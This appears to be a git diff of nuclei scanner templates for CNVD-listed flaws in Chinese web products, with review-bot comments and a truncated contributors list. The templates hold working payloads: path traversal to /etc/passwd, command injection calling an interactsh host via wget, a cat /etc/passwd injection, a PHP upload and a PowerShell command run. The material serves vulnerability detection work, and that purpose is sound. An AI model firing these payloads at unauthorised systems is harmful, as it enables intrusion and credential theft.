@@ -34,9 +40,11 @@ requests: matchers: - type: word + part: body words: - https://weiphp.cn - WeiPHP - DB_PREFIX condition: and - part: body \ No newline at end of file + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-01931.yaml b/cnvd/2021/CNVD-2021-01931.yaml new file mode 100644 index 0000000000..af7aa8ed08 --- /dev/null +++ b/cnvd/2021/CNVD-2021-01931.yaml @@ -0,0 +1,30 @@ +id: CNVD-2021-01931 + +info: + name: Ruoyi Management System - Arbitrary File Retrieval + author: daffainfo,ritikchaddha + severity: high + reference: + - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ + tags: ruoyi,lfi,cnvd,cnvd2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd" + - "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini" + + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0" + + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml new file mode 100644 index 0000000000..528666e80d --- /dev/null +++ b/cnvd/2021/CNVD-2021-09650.yaml 
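Review bot: The Ruoyi template's regex `root:.*:0:0` omits the trailing colon that the ShopXO template in this same change was corrected to (`root:.*:0:0:`), so it also accepts content such as `root:x:0:01…`; tighten it to `- "root:.*:0:0:"` for consistency and fewer false positives. With two paths and `matchers-condition: or`, nuclei sends the Windows probe even after the `/etc/passwd` request has already matched; adding `stop-at-first-match: true` under the request avoids the second traversal attempt against an already-confirmed host.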
@@ -0,0 +1,32 @@ +id: CNVD-2021-09650 + +info: + name: Ruijie EWEB Gateway Platform - Remote Command Injection + author: daffainfo + severity: critical + description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. + reference: + - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: ruijie,cnvd,cnvd2021,rce + +requests: + - raw: + - | + POST /guest_auth/guestIsUp.php + Host: {{Hostname}} + + mac=1&ip=127.0.0.1|wget {{interactsh-url}} + + unsafe: true + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2021-10543.yaml b/cnvd/2021/CNVD-2021-10543.yaml similarity index 79% rename from cnvd/CNVD-2021-10543.yaml rename to cnvd/2021/CNVD-2021-10543.yaml index a29fe66f5a..8a4354683a 100644 --- a/cnvd/CNVD-2021-10543.yaml +++ b/cnvd/2021/CNVD-2021-10543.yaml @@ -4,8 +4,9 @@ info: name: EEA Information Disclosure author: pikpikcu severity: high - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 - tags: config,exposure,cnvd + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543 + tags: config,exposure,cnvd,cnvd2021 requests: - method: GET @@ -14,7 +15,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "(.*?)" diff --git a/cnvd/2021/CNVD-2021-14536.yaml b/cnvd/2021/CNVD-2021-14536.yaml new file mode 100644 index 0000000000..d68c5af401 --- /dev/null +++ b/cnvd/2021/CNVD-2021-14536.yaml 
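Review bot: The raw request in the Ruijie EWEB template starts `POST /guest_auth/guestIsUp.php` with no HTTP version, unlike the other raw templates in this change (`POST /bsh.servlet.BshServlet HTTP/1.1`); with `unsafe: true` nuclei sends the bytes largely as written, so unless the rawhttp client fills the version in, servers may treat it as an HTTP/0.9 request and reject it — make it `POST /guest_auth/guestIsUp.php HTTP/1.1`. The out-of-band matcher only accepts `http`; since `wget` must resolve the interactsh hostname before connecting, listing `dns` as well (`words: ["http", "dns"]` with `condition: or`) also catches hosts whose egress HTTP is filtered but whose DNS resolution is not.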
@@ -0,0 +1,45 @@ +id: CNVD-2021-14536 + +info: + name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure + author: daffainfo + severity: high + description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information. + reference: + - https://www.adminxe.com/2163.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: title="RG-UAC登录页面" + tags: ruijie,cnvd,cnvd2021,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/get_dkey.php?user=admin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"pre_define"' + - '"auth_method"' + - '"name"' + - '"password"' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' + +# Enhanced by mp on 2022/03/28 diff --git a/cnvd/CNVD-2021-15822.yaml b/cnvd/2021/CNVD-2021-15822.yaml similarity index 57% rename from cnvd/CNVD-2021-15822.yaml rename to cnvd/2021/CNVD-2021-15822.yaml index 83e4dc3d9d..02ff83b22e 100644 --- a/cnvd/CNVD-2021-15822.yaml +++ b/cnvd/2021/CNVD-2021-15822.yaml @@ -4,8 +4,13 @@ info: name: ShopXO Download File Read author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog - tags: shopxo,lfi + reference: + - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + metadata: + verified: true + shodan-query: title:"ShopXO企业级B2C电商系统提供商" + fofa-query: app="ShopXO企业级B2C电商系统提供商" + tags: shopxo,lfi,cnvd,cnvd2021 requests: - raw: 
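Review bot: The extractor in the RG-UAC template copies the `super_admin` record — including the `"password"` field the matcher requires — straight into scan output, so every report, log and downstream integration now carries administrator credential material; document that with a comment above `extractors:` such as `# NOTE: extracts the super_admin entry, including the stored password — treat scan output as sensitive`, or narrow the capture group to the account name only. The character class `["a-z:,0-9]+` also stops at the first uppercase letter, underscore or other symbol, so if the password hash or any key in that JSON fragment contains one, the extractor silently yields nothing while the matcher still fires.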
@@ -16,11 +21,12 @@ requests: matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/17 diff --git a/cnvd/2021/CNVD-2021-15824.yaml b/cnvd/2021/CNVD-2021-15824.yaml new file mode 100644 index 0000000000..972a1b6064 --- /dev/null +++ b/cnvd/2021/CNVD-2021-15824.yaml @@ -0,0 +1,36 @@ +id: CNVD-2021-15824 + +info: + name: EmpireCMS DOM Cross Site-Scripting + author: daffainfo + severity: high + description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. + reference: + - https://sourceforge.net/projects/empirecms/ + - https://www.bilibili.com/read/cv10441910 + - https://vul.wangan.com/a/CNVD-2021-15824 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: empirecms,cnvd,cnvd2021,xss,domxss + +requests: + - method: GET + path: + - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'if(Request("url")!=0)' + - 'href=\""+Request("url")+"\"' + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cnvd/2021/CNVD-2021-17369.yaml b/cnvd/2021/CNVD-2021-17369.yaml new file mode 100644 index 0000000000..4a60de39cb --- /dev/null +++ b/cnvd/2021/CNVD-2021-17369.yaml 
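Review bot: The EmpireCMS template requests `/e/ViewImg/index.html?url=javascript:alert(1)` but its matcher only looks for the vulnerable JavaScript source fragments `if(Request("url")!=0)` and `href=\""+Request("url")+"\"`, so the payload plays no role in detection — the match succeeds on the static file whether or not a `url` parameter is sent. That is a reasonable, non-intrusive fingerprint of the vulnerable client-side code, but it should be stated: add `# source-based detection: fingerprints the vulnerable client-side code in index.html; the url parameter is illustrative only` above `matchers:`, or drop the `javascript:alert(1)` payload from the path so the request does not read as an exploit attempt in target logs.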
@@ -0,0 +1,36 @@ +id: CNVD-2021-17369 + +info: + name: Ruijie Smartweb Management System Password Information Disclosure + author: pikpikcu + severity: high + description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege. + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ruijie,disclosure,cnvd,cnvd2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/web/xml/webuser-auth.xml" + headers: + Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cnvd/2021/CNVD-2021-26422.yaml b/cnvd/2021/CNVD-2021-26422.yaml new file mode 100644 index 0000000000..8ceb9e5c8d --- /dev/null +++ b/cnvd/2021/CNVD-2021-26422.yaml 
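Review bot: As rendered here both `words` entries under the word matcher are empty strings (`- ""` twice); if that is the file's actual content rather than angle-bracket markup dropped on the way to this view, the matcher accepts any body and the template fires on every 200 response to `/web/xml/webuser-auth.xml`. Please confirm the two strings are the intended XML element names, since the same empty pair is visible in the deleted `cnvd/CNVD-2021-17369.yaml` and would have carried over. The `severity` also moves from `medium` in the deleted file to `high` with a new CVSS vector but the same single reference; a one-line rationale in the commit would help reviewers.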
@@ -0,0 +1,36 @@ +id: CNVD-2021-26422 + +info: + name: eYouMail - Remote Code Execution + author: daffainfo + severity: critical + description: eYouMail is susceptible to a remote code execution vulnerability. + reference: + - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py + - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: eyoumail,rce,cnvd,cnvd2021 + +requests: + - raw: + - | + POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type='|cat /etc/passwd||' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/vulnerabilities/other/landray-oa-fileread.yaml b/cnvd/2021/CNVD-2021-28277.yaml similarity index 66% rename from vulnerabilities/other/landray-oa-fileread.yaml rename to cnvd/2021/CNVD-2021-28277.yaml index 89b603702d..1277253402 100644 --- a/vulnerabilities/other/landray-oa-fileread.yaml +++ b/cnvd/2021/CNVD-2021-28277.yaml @@ -1,11 +1,15 @@ -id: landray-oa-fileread +id: CNVD-2021-28277 info: - name: Landray-OA Fileread - author: pikpikcu + name: Landray-OA Arbitrary - Arbitrary File Retrieval + author: pikpikcu,daffainfo severity: high - reference: https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw - tags: landray,lfi + reference: + - https://www.aisoutu.com/a/1432457 + - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw + metadata: + fofa-query: app="Landray OA system" + tags: landray,lfi,cnvd,cnvd2021 requests: - raw: 
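Review bot: The `description` only restates the name (`eYouMail is susceptible to a remote code execution vulnerability.`) and omits what an operator needs to triage a hit: the affected version range and the injection point, which from the request body appears to be the `type` parameter of `/webadm/?q=moni_detail.do`. The check also executes a command on the target, and the template does not say so; templates that run commands should state that they are intrusive in `description` so they can be excluded from passive runs. Both references are third-party PoC write-ups; the CNVD advisory page would anchor the id.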
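Review bot: The new `name` reads `Landray-OA Arbitrary - Arbitrary File Retrieval`, which repeats the word and breaks the `Product - Issue` form the other templates in this commit use (`eYouMail - Remote Code Execution`, `Sunflower Simple and Personal - Remote Code Execution`); `name: Landray-OA - Arbitrary File Retrieval` is presumably what was meant. The `id` becomes `CNVD-2021-28277`, but neither reference is the CNVD advisory, so nothing in the template ties the two blog posts to that id; adding the cnvd.org.cn entry would make the rename verifiable. The `requests` block continues outside this hunk.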
@@ -25,6 +29,7 @@ requests: var={"body":{"file":"file:///c://windows/win.ini"}} + stop-at-first-match: true matchers-condition: and matchers: @@ -36,4 +41,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/2021/CNVD-2021-30167.yaml similarity index 93% rename from cnvd/CNVD-2021-30167.yaml rename to cnvd/2021/CNVD-2021-30167.yaml index 41c508efc2..d3ef8cc275 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/2021/CNVD-2021-30167.yaml @@ -7,7 +7,7 @@ info: reference: - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A - https://www.cnvd.org.cn/webinfo/show/6491 - tags: beanshell,rce,cnvd + tags: beanshell,rce,cnvd,cnvd2021,yonyou requests: - raw: @@ -27,7 +27,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "uid=" @@ -40,4 +39,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cnvd/2021/CNVD-2021-49104.yaml b/cnvd/2021/CNVD-2021-49104.yaml new file mode 100644 index 0000000000..125c446080 --- /dev/null +++ b/cnvd/2021/CNVD-2021-49104.yaml 
@@ -0,0 +1,48 @@ +id: CNVD-2021-49104 + +info: + name: Pan Micro E-office File Uploads + author: pikpikcu + severity: critical + description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker. + reference: + - https://chowdera.com/2021/12/202112200602130067.html + - http://v10.e-office.cn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L + cvss-score: 9.9 + cwe-id: CWE-434 + remediation: Pan Wei has released an update to resolve this vulnerability. + tags: pan,micro,cnvd,cnvd2021 + +requests: + - raw: + - | + POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + + --e64bdf16c554bbc109cecef6451c26a4 + Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php" + Content-Type: image/jpeg + + + + --e64bdf16c554bbc109cecef6451c26a4-- + + - | + GET /images/logo/logo-eoffice.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "94d01a2324ce38a2e29a629c54190f67" + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/02/28 diff --git a/cnvd/2022/CNVD-2022-03672.yaml b/cnvd/2022/CNVD-2022-03672.yaml new file mode 100644 index 0000000000..b3e9de9132 --- /dev/null +++ b/cnvd/2022/CNVD-2022-03672.yaml 
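Review bot: A successful run leaves a web-reachable PHP file on the target — the template uploads `{{randstr}}.php` and then fetches `/images/logo/logo-eoffice.php` for a fixed marker, and never removes it — so `description` should state that the check is intrusive and name the artifact, letting operators clean up or exclude the template. As rendered here the upload body between `Content-Type: image/jpeg` and the closing boundary is blank; if that is the file's content rather than markup dropped in this view, the second request can never contain `94d01a2324ce38a2e29a629c54190f67` and the template cannot match, so please confirm. Also `tags: pan,micro,cnvd,cnvd2021` splits the vendor name into two tokens (`pan` alone is too generic to select on) while the description calls the vendor `Pan Wei`; one consistent vendor tag is better.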
@@ -0,0 +1,49 @@ +id: CNVD-2022-03672 + +info: + name: Sunflower Simple and Personal - Remote Code Execution + author: daffainfo + severity: critical + description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability. + reference: + - https://www.1024sou.com/article/741374.html + - https://copyfuture.com/blogs-details/202202192249158884 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: cnvd,cnvd2020,sunflower,rce + +requests: + - raw: + - | + POST /cgi-bin/rpc HTTP/1.1 + Host: {{Hostname}} + + action=verify-haras + - | + GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1 + Host: {{Hostname}} + Cookie: CID={{cid}} + + extractors: + - type: regex + name: cid + internal: true + group: 1 + regex: + - '"verify_string":"(.*)"' + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1==200" + - "status_code_2==200" + - "contains(body_1, 'verify_string')" + - "contains(body_2, 'Windows IP')" + condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml deleted file mode 100644 index 9cebd8d7b0..0000000000 --- a/cnvd/CNVD-2019-06255.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CNVD-2019-06255 - -info: - name: CatfishCMS RCE - author: Lark-Lab - severity: medium - reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/ - tags: rce,cvnd,catfishcms - -requests: - - method: GET - path: - - "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - condition: and - words: - - 'OS' - - 'PATH' - - 'SHELL' - - 'USER' 
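Review bot: `tags: cnvd,cnvd2020,sunflower,rce` carries the year tag `cnvd2020` for an id of `CNVD-2022-03672`; every other template in this commit pairs the id year with its tag (`cnvd2021` for the 2021 ids), so this should read `tags: cnvd,cnvd2022,sunflower,rce`, otherwise runs selected with `-tags cnvd2022` skip it. The `reference` list also includes `CNVD-2022-10270`, a different advisory id; if it is a related issue that deserves a word in `description`, otherwise it should be dropped. Finally, the second request runs `ipconfig` through PowerShell on the target, so `description` should say the check is intrusive rather than only `is susceptible to a remote code execution vulnerability`.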
diff --git a/cnvd/CNVD-2021-17369.yaml b/cnvd/CNVD-2021-17369.yaml deleted file mode 100644 index 8377c8296c..0000000000 --- a/cnvd/CNVD-2021-17369.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CNVD-2021-17369 - -info: - name: Ruijie Smartweb Management System Password Information Disclosure - author: pikpikcu - severity: medium - reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369 - tags: ruijie,disclosure,cnvd - -requests: - - method: GET - path: - - "{{BaseURL}}/web/xml/webuser-auth.xml" - headers: - Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest - - matchers-condition: and - matchers: - - - type: word - words: - - "" - - "" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/contributors.json b/contributors.json new file mode 100644 index 0000000000..57dfa18e1b --- /dev/null +++ b/contributors.json 
@@ -0,0 +1,1352 @@ +[ + { + "author": "Tirtha", + "links": { + "github": "https://github.com/darkc0d37", + "twitter": "https://twitter.com/tirtha_mandal", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "duty_1g", + "links": { + "github": "", + "twitter": "https://twitter.com/duty_1g", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "phyr3wall", + "links": { + "github": "", + "twitter": "https://twitter.com/phyr3wall", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "0xPrial", + "links": { + "github": "https://www.github.com/0xPrial", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "0xSmiley", + "links": { + "github": "https://www.github.com/0xSmiley", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "0xceeb", + "links": { + "github": "https://www.github.com/0xceeb", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "5tr1x", + "links": { + "github": "https://www.github.com/5tr1x", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Abss0x7tbh", + "links": { + "github": "https://www.github.com/Abss0x7tbh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "AdamCrosser", + "links": { + "github": "https://www.github.com/AdamCrosser", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Ais8Ooz8", + "links": { + "github": "https://www.github.com/Ais8Ooz8", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Akokonunes", + "links": { + "github": "https://www.github.com/Akokonunes", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Al-AizHashim", + "links": { + "github": "https://www.github.com/Al-AizHashim", + "twitter": "", + "linkedin": "", + "website": "", + "email": 
"" + } + }, + { + "author": "Alex-null", + "links": { + "github": "https://www.github.com/Alex-null", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Anon-Artist", + "links": { + "github": "https://www.github.com/Anon-Artist", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "CS-Student118", + "links": { + "github": "https://www.github.com/CS-Student118", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Dheerajmadhukar", + "links": { + "github": "https://www.github.com/Dheerajmadhukar", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Ganofins", + "links": { + "github": "https://www.github.com/Ganofins", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Haones", + "links": { + "github": "https://www.github.com/Haones", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ImNightmaree", + "links": { + "github": "https://www.github.com/ImNightmaree", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "JAS-37", + "links": { + "github": "https://www.github.com/JAS-37", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "JPMartinezz", + "links": { + "github": "https://www.github.com/JPMartinezz", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "LogicalHunter", + "links": { + "github": "https://www.github.com/LogicalHunter", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "LuskaBol", + "links": { + "github": "https://www.github.com/LuskaBol", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "MMrhassel", + "links": { + "github": "https://www.github.com/MMrhassel", + "twitter": "", + "linkedin": "", + "website": "", + 
"email": "" + } + }, + { + "author": "Mad-robot", + "links": { + "github": "https://www.github.com/Mad-robot", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", + "links": { + "github": "https://www.github.com/Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Mubspatel", + "links": { + "github": "https://www.github.com/Mubspatel", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "NagliNagli", + "links": { + "github": "https://www.github.com/NagliNagli", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "P4rtyH4RD", + "links": { + "github": "https://www.github.com/P4rtyH4RD", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "PR3R00T", + "links": { + "github": "https://www.github.com/PR3R00T", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "RandomRobbieBF", + "links": { + "github": "https://www.github.com/RandomRobbieBF", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "SMHTahsin33", + "links": { + "github": "https://www.github.com/SMHTahsin33", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Serizao", + "links": { + "github": "https://www.github.com/Serizao", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Shivang0", + "links": { + "github": "https://www.github.com/Shivang0", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "StreetOfHackerR007", + "links": { + "github": "https://www.github.com/StreetOfHackerR007", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Sy3Omda", + "links": { + "github": 
"https://www.github.com/Sy3Omda", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "TheConciergeDev", + "links": { + "github": "https://www.github.com/TheConciergeDev", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "Udyz", + "links": { + "github": "https://www.github.com/Udyz", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "YashGoti", + "links": { + "github": "https://www.github.com/YashGoti", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ZultanH", + "links": { + "github": "https://www.github.com/ZultanH", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "abison1", + "links": { + "github": "https://www.github.com/abison1", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "adiffpirate", + "links": { + "github": "https://www.github.com/adiffpirate", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "adriyansyah-mf", + "links": { + "github": "https://www.github.com/adriyansyah-mf", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "afaq1337", + "links": { + "github": "https://www.github.com/afaq1337", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "aiNeu0taip9ue", + "links": { + "github": "https://www.github.com/aiNeu0taip9ue", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ajaysenr", + "links": { + "github": "https://www.github.com/ajaysenr", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "alanbriangh", + "links": { + "github": "https://www.github.com/alanbriangh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "alifathi-h1", + "links": { + "github": 
"https://www.github.com/alifathi-h1", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "alph4byt3", + "links": { + "github": "https://www.github.com/alph4byt3", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "and-bf", + "links": { + "github": "https://www.github.com/and-bf", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "asurti6783", + "links": { + "github": "https://www.github.com/asurti6783", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "atastycookie", + "links": { + "github": "https://www.github.com/atastycookie", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bad5ect0r", + "links": { + "github": "https://www.github.com/bad5ect0r", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bauthard", + "links": { + "github": "https://www.github.com/bauthard", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bing0o", + "links": { + "github": "https://www.github.com/bing0o", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bjhulst", + "links": { + "github": "https://www.github.com/bjhulst", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "blckraven", + "links": { + "github": "https://www.github.com/blckraven", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "bnematzadeh", + "links": { + "github": "https://www.github.com/bnematzadeh", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "ca3s1m", + "links": { + "github": "https://www.github.com/ca3s1m", + "twitter": "", + "linkedin": "", + "website": "", + "email": "" + } + }, + { + "author": "daffainfo", + "links": { + "github": 
